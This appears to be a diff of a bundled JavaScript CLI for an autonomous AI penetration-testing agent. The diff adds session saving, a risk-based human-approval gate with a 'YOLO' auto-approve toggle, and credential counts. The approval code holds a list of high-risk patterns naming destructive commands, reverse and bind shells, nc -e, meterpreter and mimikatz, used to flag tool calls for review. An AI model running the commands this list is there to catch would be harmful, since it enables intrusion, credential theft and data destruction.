+            const metadataPath = path3.join(this.sessionsDir, entry.name, "metadata.json");
+            const content = await fs3.readFile(metadataPath, "utf-8");
+            const metadata = JSON.parse(content);
+            sessions.push({
+              id: metadata.id,
+              objective: metadata.objective,
+              target: metadata.target,
+              status: metadata.status,
+              updatedAt: metadata.updatedAt
+            });
+          } catch {
+          }
+        }
+      }
+      sessions.sort(
+        (a, b) => new Date(b.updatedAt).getTime() - new Date(a.updatedAt).getTime()
+      );
+      return sessions;
+    } catch {
+      return [];
+    }
+  }
+  /**
+   * Get most recent session
+   */
+  async getRecentSession() {
+    const sessions = await this.listSessions();
+    if (sessions.length === 0) return null;
+    return this.loadSession(sessions[0].id);
+  }
+  /**
+   * Delete a session
+   */
+  async deleteSession(sessionId) {
+    try {
+      const sessionDir = path3.join(this.sessionsDir, sessionId);
+      await fs3.rm(sessionDir, { recursive: true });
+      this.emit("session_deleted", sessionId);
+      return true;
+    } catch {
+      return false;
+    }
+  }
+  /**
+   * Mark current session as completed/failed
+   */
+  async endSession(status) {
+    if (!this.currentSession) return;
+    this.currentSession.status = status;
+    this.currentSession.updatedAt = (/* @__PURE__ */ new Date()).toISOString();
+    await this.saveMetadata(this.currentSession);
+    this.emit("session_ended", { id: this.currentSession.id, status });
+    this.currentSession = null;
+  }
+  /**
+   * Get current session
+   */
+  getCurrentSession() {
+    return this.currentSession;
+  }
+};
+var sessionManager = null;
+function getSessionManager() {
+  if (!sessionManager) {
+    sessionManager = new SessionManager();
+  }
+  return sessionManager;
+}
+
+// src/core/approval/approval-manager.ts
+import { EventEmitter as EventEmitter5 } from "events";
+var APPROVAL_EVENT = {
+  REQUEST: "approval_request",
+  RESPONSE: "approval_response",
+  TIMEOUT: "approval_timeout"
+};
+var CRITICAL_TOOLS = [
+  "execute_command",
+  "write_file",
+  "delete_file",
+  "modify_file",
+  "send_request",
+  "exploit_execute"
+];
+var HIGH_RISK_PATTERNS = [
+  /rm\s+-rf/i,
+  /mkfs/i,
+  /dd\s+if=/i,
+  /format/i,
+  /shutdown/i,
+  /reboot/i,
+  /kill\s+-9/i,
+  /pkill/i,
+  /iptables/i,
+  /ufw/i,
+  /firewall/i,
+  /passwd/i,
+  /useradd/i,
+  /userdel/i,
+  /chmod\s+777/i,
+  /chown/i,
+  /sudo/i,
+  /su\s+-/i,
+  /nc\s+-e/i,
+  /bash\s+-i/i,
+  /reverse.*shell/i,
+  /bind.*shell/i,
+  /meterpreter/i,
+  /mimikatz/i
+];
+function assessRisk(toolName, toolInput) {
+  const inputStr = JSON.stringify(toolInput).toLowerCase();
+  for (const pattern of HIGH_RISK_PATTERNS) {
+    if (pattern.test(inputStr)) {
+      return "critical";
+    }
+  }
+  if (CRITICAL_TOOLS.includes(toolName)) {
+    return "high";
+  }
+  if (toolName.includes("script") || toolName.includes("exec")) {
+    return "medium";
+  }
+  if (toolName.includes("scan") || toolName.includes("request")) {
+    return "medium";
+  }
+  return "low";
+}
+function generateRequestId() {
+  return `approval_${Date.now()}_${Math.random().toString(36).substring(2, 8)}`;
+}
+var ApprovalManager = class extends EventEmitter5 {
+  pendingRequests = /* @__PURE__ */ new Map();
+  autoApprovedTools = /* @__PURE__ */ new Set();
+  autoDeniedTools = /* @__PURE__ */ new Set();
+  yoloMode = false;
+  defaultTimeout = 6e4;
+  // 1 minute
+  constructor(options) {
+    super();
+    this.yoloMode = options?.yoloMode ?? false;
+    this.defaultTimeout = options?.timeout ?? 6e4;
+  }
+  /**
+   * Enable/disable YOLO mode (auto-approve everything)
+   */
+  setYoloMode(enabled) {
+    this.yoloMode = enabled;
+    this.emit("yolo_mode_changed", enabled);
+  }
+  /**
+   * Check if approval is required for a tool call
+   */
+  requiresApproval(toolName, toolInput) {
+    if (this.yoloMode) return false;
+    if (this.autoApprovedTools.has(toolName)) return false;
+    if (this.autoDeniedTools.has(toolName)) return true;
+    const risk = assessRisk(toolName, toolInput);
+    if (risk === "low") return false;
+    return true;
+  }
+  /**
+   * Request approval for a tool call
+   */
+  async requestApproval(toolName, toolInput, reason) {
+    if (this.autoDeniedTools.has(toolName)) {
+      return "deny";
+    }
+    if (this.autoApprovedTools.has(toolName)) {
+      return "approve";
+    }
+    const risk = assessRisk(toolName, toolInput);
+    const request = {
+      id: generateRequestId(),
+      toolName,
+      toolInput,
+      reason: reason || `Tool "${toolName}" requires approval (${risk} risk)`,
+      riskLevel: risk,
+      timestamp: (/* @__PURE__ */ new Date()).toISOString()
+    };
+    this.pendingRequests.set(request.id, request);
+    this.emit(APPROVAL_EVENT.REQUEST, request);
+    return new Promise((resolve) => {
+      const timeout = setTimeout(() => {
+        this.pendingRequests.delete(request.id);
+        this.emit(APPROVAL_EVENT.TIMEOUT, request.id);
+        resolve("deny");
+      }, this.defaultTimeout);
+      const responseHandler = (response) => {
+        if (response.requestId === request.id) {
+          clearTimeout(timeout);
+          this.pendingRequests.delete(request.id);
+          this.removeListener(APPROVAL_EVENT.RESPONSE, responseHandler);
+          if (response.decision === "approve_always") {
+            this.autoApprovedTools.add(toolName);
+            resolve("approve");
+          } else if (response.decision === "deny_always") {
+            this.autoDeniedTools.add(toolName);
+            resolve("deny");
+          } else {
+            resolve(response.decision);
+          }
+        }
+      };
+      this.on(APPROVAL_EVENT.RESPONSE, responseHandler);
+    });
+  }
+  /**
+   * Respond to an approval request (called by UI)
+   */
+  respond(requestId, decision) {
+    const response = {
+      requestId,
+      decision,
+      respondedAt: (/* @__PURE__ */ new Date()).toISOString()
+    };
+    this.emit(APPROVAL_EVENT.RESPONSE, response);
+  }
+  /**
+   * Get pending requests
+   */
+  getPendingRequests() {
+    return Array.from(this.pendingRequests.values());
+  }
+  /**
+   * Get auto-approved tools
+   */
+  getAutoApprovedTools() {
+    return Array.from(this.autoApprovedTools);
+  }
+  /**
+   * Reset all auto decisions
+   */
+  resetAutoDecisions() {
+    this.autoApprovedTools.clear();
+    this.autoDeniedTools.clear();
+  }
 };
+var approvalManager = null;
+function getApprovalManager(options) {
+  if (!approvalManager) {
+    approvalManager = new ApprovalManager(options);
+  }
+  return approvalManager;
+}
 
 // src/config/theme.ts
 var THEME = {
@@ -2760,7 +4285,10 @@ var App = ({ autoApprove = false, target }) => {
   const [isProcessing, setIsProcessing] = useState(false);
   const [currentStatus, setCurrentStatus] = useState("");
   const [elapsedTime, setElapsedTime] = useState(0);
+  const [pendingApproval, setPendingApproval] = useState(null);
   const [agent] = useState(() => new AutonomousHackingAgent(void 0, { autoApprove }));
+  const sessionManager2 = getSessionManager();
+  const approvalManager2 = getApprovalManager({ yoloMode: autoApprove });
   const startTimeRef = useRef(0);
   const timerRef = useRef(null);
   const addMessage = useCallback((type, content, duration) => {
@@ -2789,6 +4317,9 @@ var App = ({ autoApprove = false, target }) => {
   }, []);
   useEffect(() => {
     addMessage(MESSAGE_TYPE.SYSTEM, "Pentesting Agent initialized. Type /help for commands.");
+    if (autoApprove) {
+      addMessage(MESSAGE_TYPE.SYSTEM, "\u26A0\uFE0F  YOLO mode: Auto-approving all tools");
+    }
     if (target) {
       agent.setTarget(target);
       addMessage(MESSAGE_TYPE.SYSTEM, `Target: ${target}`);
@@ -2812,6 +4343,12 @@ var App = ({ autoApprove = false, target }) => {
     agent.on(AGENT_EVENT.FINDING, (finding) => {
       addMessage(MESSAGE_TYPE.SYSTEM, `\u{1F3AF} [${finding.severity.toUpperCase()}] ${finding.title}`);
     });
+    agent.on(AGENT_EVENT.PHASE_CHANGE, (data) => {
+      addMessage(MESSAGE_TYPE.SYSTEM, `\u{1F4CD} Phase: ${data.phaseId}`);
+    });
+    agent.on(AGENT_EVENT.CONTEXT_COMPACTED, () => {
+      addMessage(MESSAGE_TYPE.SYSTEM, "\u{1F4BE} Context compacted to save tokens");
+    });
     agent.on(AGENT_EVENT.COMPLETE, () => {
       const duration = stopTimer();
       addMessage(MESSAGE_TYPE.SYSTEM, `\u2713 Complete (${duration}s)`);
@@ -2823,13 +4360,32 @@ var App = ({ autoApprove = false, target }) => {
       addMessage(MESSAGE_TYPE.ERROR, error.message);
       setIsProcessing(false);
     });
+    approvalManager2.on(APPROVAL_EVENT.REQUEST, (req) => {
+      setPendingApproval({
+        id: req.id,
+        toolName: req.toolName,
+        riskLevel: req.riskLevel
+      });
+      addMessage(MESSAGE_TYPE.SYSTEM, `\u26A0\uFE0F  APPROVAL NEEDED: ${req.toolName} (${req.riskLevel} risk)`);
+      addMessage(MESSAGE_TYPE.SYSTEM, `   ${req.reason}`);
+      addMessage(MESSAGE_TYPE.SYSTEM, "   Type /approve or /deny");
+    });
     return () => {
       if (timerRef.current) clearInterval(timerRef.current);
     };
-  }, [agent, target, addMessage, stopTimer]);
+  }, [agent, target, addMessage, stopTimer, autoApprove, approvalManager2]);
   const handleSubmit = useCallback(async (value) => {
     const trimmed = value.trim();
-    if (!trimmed || isProcessing) return;
+    if (!trimmed) return;
+    if (pendingApproval && (trimmed === "/approve" || trimmed === "/deny" || trimmed === "/y" || trimmed === "/n")) {
+      const decision = trimmed === "/approve" || trimmed === "/y" ? "approve" : "deny";
+      approvalManager2.respond(pendingApproval.id, decision);
+      addMessage(MESSAGE_TYPE.SYSTEM, decision === "approve" ? "\u2713 Approved" : "\u2717 Denied");
+      setPendingApproval(null);
+      setInput("");
+      return;
+    }
+    if (isProcessing && !trimmed.startsWith("/")) return;
     setInput("");
     addMessage(MESSAGE_TYPE.USER, trimmed);
     if (trimmed.startsWith("/")) {
@@ -2840,11 +4396,15 @@ var App = ({ autoApprove = false, target }) => {
           addMessage(
             MESSAGE_TYPE.SYSTEM,
             `/target <ip>     Set target
-/start [goal]    Start pentest  
+/start [goal]    Start autonomous pentest  
 /stop            Stop operation
 /findings        Show findings
+/sessions        List saved sessions
+/resume [id]     Resume session
+/yolo            Toggle auto-approve
 /clear           Clear screen
-/exit            Exit`
+/exit            Exit
+/approve /deny   Approve/deny tool (during approval)`
           );
           return;
         case CLI_COMMAND.TARGET:
@@ -2858,11 +4418,18 @@ var App = ({ autoApprove = false, target }) => {
           return;
         case CLI_COMMAND.START:
         case "s":
+          if (!agent.getState().target.primary) {
+            addMessage(MESSAGE_TYPE.ERROR, "Set target first: /target <ip>");
+            return;
+          }
           setIsProcessing(true);
           startTimer();
           const objective = args.join(" ") || "Perform comprehensive penetration testing";
           setCurrentStatus("Initializing...");
+          addMessage(MESSAGE_TYPE.SYSTEM, `\u{1F680} Starting: ${objective}`);
           try {
+            const session = await sessionManager2.createSession(objective, agent.getState().target.primary);
+            addMessage(MESSAGE_TYPE.SYSTEM, `\u{1F4C1} Session: ${session.id}`);
             await agent.runAutonomous(objective);
           } catch (e) {
             addMessage(MESSAGE_TYPE.ERROR, e instanceof Error ? e.message : String(e));
@@ -2884,9 +4451,44 @@ var App = ({ autoApprove = false, target }) => {
           if (findings.length === 0) {
             addMessage(MESSAGE_TYPE.SYSTEM, "No findings.");
           } else {
+            addMessage(MESSAGE_TYPE.SYSTEM, `--- ${findings.length} Findings ---`);
             findings.forEach((f) => addMessage(MESSAGE_TYPE.SYSTEM, `[${f.severity}] ${f.title}`));
           }
           return;
+        case "sessions":
+          try {
+            const sessions = await sessionManager2.listSessions();
+            if (sessions.length === 0) {
+              addMessage(MESSAGE_TYPE.SYSTEM, "No saved sessions.");
+            } else {
+              addMessage(MESSAGE_TYPE.SYSTEM, `--- ${sessions.length} Sessions ---`);
+              sessions.slice(0, 5).forEach(
+                (s) => addMessage(MESSAGE_TYPE.SYSTEM, `${s.id.slice(-8)} | ${s.target} | ${s.status}`)
+              );
+            }
+          } catch {
+            addMessage(MESSAGE_TYPE.ERROR, "Failed to list sessions");
+          }
+          return;
+        case "resume":
+          try {
+            const session = args[0] ? await sessionManager2.loadSession(args[0]) : await sessionManager2.getRecentSession();
+            if (session) {
+              agent.setTarget(session.metadata.target);
+              addMessage(MESSAGE_TYPE.SYSTEM, `Resumed: ${session.metadata.objective}`);
+              addMessage(MESSAGE_TYPE.SYSTEM, `Target: ${session.metadata.target}`);
+            } else {
+              addMessage(MESSAGE_TYPE.ERROR, "No session found");
+            }
+          } catch {
+            addMessage(MESSAGE_TYPE.ERROR, "Failed to resume session");
+          }
+          return;
+        case "yolo":
+          const newYoloState = !approvalManager2.getAutoApprovedTools().length;
+          approvalManager2.setYoloMode(newYoloState);
+          addMessage(MESSAGE_TYPE.SYSTEM, newYoloState ? "\u26A0\uFE0F  YOLO mode ON - Auto-approving all tools" : "\u{1F512} YOLO mode OFF - Manual approval required");
+          return;
         case CLI_COMMAND.CLEAR:
         case "c":
           setMessages([]);
@@ -2896,8 +4498,33 @@ var App = ({ autoApprove = false, target }) => {
         case "q":
           exit();
           return;
+        case "approve":
+        case "y":
+          if (pendingApproval) {
+            approvalManager2.respond(pendingApproval.id, "approve");
+            addMessage(MESSAGE_TYPE.SYSTEM, "\u2713 Approved");
+            setPendingApproval(null);
+          } else {
+            addMessage(MESSAGE_TYPE.ERROR, "No pending approval");
+          }
+          return;
+        case "deny":
+        case "n":
+          if (pendingApproval) {
+            approvalManager2.respond(pendingApproval.id, "deny");
+            addMessage(MESSAGE_TYPE.SYSTEM, "\u2717 Denied");
+            setPendingApproval(null);
+          } else {
+            addMessage(MESSAGE_TYPE.ERROR, "No pending approval");
+          }
+          return;
         default:
-          addMessage(MESSAGE_TYPE.ERROR, `Unknown: ${cmd}`);
+          const cmdResult = await agent.processCommand(trimmed);
+          if (cmdResult) {
+            addMessage(MESSAGE_TYPE.ASSISTANT, cmdResult);
+          } else {
+            addMessage(MESSAGE_TYPE.ERROR, `Unknown: ${cmd}`);
+          }
           return;
       }
     }
@@ -2905,15 +4532,17 @@ var App = ({ autoApprove = false, target }) => {
     startTimer();
     setCurrentStatus("Thinking...");
     try {
-      await agent.processUserHint(trimmed);
-      addMessage(MESSAGE_TYPE.SYSTEM, "Hint received.");
+      const response = await agent.chat(trimmed);
+      if (response) {
+        addMessage(MESSAGE_TYPE.ASSISTANT, response);
+      }
     } catch (e) {
       addMessage(MESSAGE_TYPE.ERROR, e instanceof Error ? e.message : String(e));
     }
     stopTimer();
     setIsProcessing(false);
     setCurrentStatus("");
-  }, [agent, isProcessing, addMessage, exit, startTimer, stopTimer]);
+  }, [agent, isProcessing, pendingApproval, addMessage, exit, startTimer, stopTimer, sessionManager2, approvalManager2]);
   useInput((input2, key) => {
     if (key.ctrl && input2 === "c") {
       if (isProcessing) {
@@ -2954,6 +4583,13 @@ var App = ({ autoApprove = false, target }) => {
         ] })
       ] }) }, msg.id);
     } }) }),
+    pendingApproval && /* @__PURE__ */ jsx(Box, { marginBottom: 1, children: /* @__PURE__ */ jsxs(Text, { color: THEME.status.error, bold: true, children: [
+      "\u26A0\uFE0F  Awaiting approval for ",
+      pendingApproval.toolName,
+      " (",
+      pendingApproval.riskLevel,
+      ")"
+    ] }) }),
     isProcessing ? /* @__PURE__ */ jsxs(Box, { children: [
       /* @__PURE__ */ jsx(Text, { color: THEME.status.running, children: /* @__PURE__ */ jsx(Spinner, { type: "dots" }) }),
       /* @__PURE__ */ jsxs(Text, { color: THEME.text.muted, children: [
@@ -2983,6 +4619,8 @@ var App = ({ autoApprove = false, target }) => {
         " \u2502",
         state.findings.length,
         " findings \u2502",
+        state.credentials.length,
+        " creds \u2502",
         state.currentPhase !== AGENT_STATUS.IDLE && ` ${state.currentPhase} \u2502`
       ] }),
       /* @__PURE__ */ jsxs(Text, { dimColor: true, children: [
@@ -3052,8 +4690,8 @@ program.command("run <objective>").alias("r").description("Run a single objectiv
     const summary = agent.getSummary();
     console.log(JSON.stringify(summary, null, 2));
     if (options.output) {
-      const fs5 = await import("fs/promises");
-      await fs5.writeFile(options.output, JSON.stringify(summary, null, 2));
+      const fs4 = await import("fs/promises");
+      await fs4.writeFile(options.output, JSON.stringify(summary, null, 2));
       console.log(chalk.hex(THEME.text.accent)(`
 [+] Report saved to: ${options.output}`));
     }